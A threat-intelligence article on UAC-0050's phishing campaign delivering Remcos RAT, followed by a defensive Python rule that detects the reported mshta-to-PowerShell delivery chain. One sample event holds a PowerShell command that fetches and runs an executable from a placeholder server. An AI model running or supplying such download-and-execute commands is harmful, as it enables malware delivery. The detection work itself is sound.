UAC-0050, a threat actor active since 2020, is employing sophisticated phishing tactics to distribute the notorious Remcos RAT, known for its capabilities in remote surveillance and control. According to Uptycs security researchers Karthick Kumar and Shilpesh Trivedi, the group has recently integrated a pipe method for interprocess communication, showcasing advanced adaptability in their operational methods.
UAC-0050 has a history of targeting Ukrainian and Polish entities through social engineering campaigns, using phishing emails that impersonate legitimate organizations. In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) linked the group to a phishing campaign designed to deliver Remcos RAT.
Over the past few months, the Remcos RAT has been distributed as part of at least three different phishing waves, with one attack leading to the deployment of an information stealer called Meduza Stealer. The researchers based their analysis on an LNK file discovered on December 21, 2023.
While the exact initial access vector is currently unknown, it is suspected to have involved phishing emails targeting Ukrainian military personnel, advertising consultancy roles with the Israel Defense Forces (IDF). The LNK file collects information about installed antivirus products, retrieves and executes an HTML application, and paves the way for a PowerShell script that downloads two files from a remote server.
The downloaded files, “word_update.exe” and “ofer.docx,” are then utilized to establish persistence and execute the Remcos RAT (version 4.9.2 Pro). The Remcos RAT has the capability to harvest system data, cookies, and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.
Notably, the group employs unnamed pipes within the Windows operating system, creating a covert channel for data transfer, effectively evading detection by Endpoint Detection and Response (EDR) and antivirus systems. Despite not being an entirely new technique, the use of pipes marks a significant leap in the sophistication of UAC-0050’s strategies.
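As an added defensive example (not from the Uptycs report or this article), the delivery chain described above written as a process-ancestry rule over constructed, Sysmon-style process-creation events. The record layout, the assumption that the HTML application runs under mshta.exe, and the assumption that the PowerShell downloader names word_update.exe on its command line are mine, not the page's; the sample pids, paths and host names are placeholders.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:  # one constructed, Sysmon-like process-creation record
    pid: int
    ppid: int
    image: str    # image file name as logged
    cmdline: str  # command line as logged

def _image_is(e, name):
    return e.image.lower() == name

# The reported delivery chain, parent first: the HTML application (assumed to run under
# mshta.exe) -> the PowerShell downloader (assumed to name word_update.exe on its command
# line) -> the dropped executable that carries Remcos. Each entry is a predicate on one event.
REMCOS_DELIVERY_CHAIN = [
    lambda e: _image_is(e, "mshta.exe"),
    lambda e: _image_is(e, "powershell.exe") and "word_update.exe" in e.cmdline.lower(),
    lambda e: _image_is(e, "word_update.exe"),
]

def match_chain(events, chain=REMCOS_DELIVERY_CHAIN):
    """Return every pid path (parent first) whose ancestry satisfies `chain` stage by stage."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for leaf in events:
        if not chain[-1](leaf):
            continue
        path, node, ok = [leaf], leaf, True
        for pred in reversed(chain[:-1]):          # walk up through the parents
            node = by_pid.get(node.ppid)
            if node is None or not pred(node):
                ok = False
                break
            path.append(node)
        if ok:
            hits.append([p.pid for p in reversed(path)])
    return hits

# Constructed sample telemetry: pids, paths and host names are placeholders, not indicators.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(512, 400, "mshta.exe", "mshta.exe C:\\Users\\u\\Downloads\\[placeholder].hta"),
    ProcEvent(640, 512, "powershell.exe", "powershell -c iwr http://[server-placeholder]/word_update.exe "
              "-o word_update.exe; iwr http://[server-placeholder]/ofer.docx -o ofer.docx; .\\word_update.exe"),
    ProcEvent(700, 640, "word_update.exe", "C:\\Users\\u\\Downloads\\word_update.exe"),
    ProcEvent(800, 400, "powershell.exe", "powershell -c Get-Process"),   # benign admin use
    ProcEvent(910, 400, "word_update.exe", "word_update.exe"),             # same name, no delivery ancestry
]
```

Requiring the whole mshta.exe -> powershell.exe -> word_update.exe ancestry is what separates this rule from a bare filename match: the lone word_update.exe started from explorer.exe in the sample is not reported.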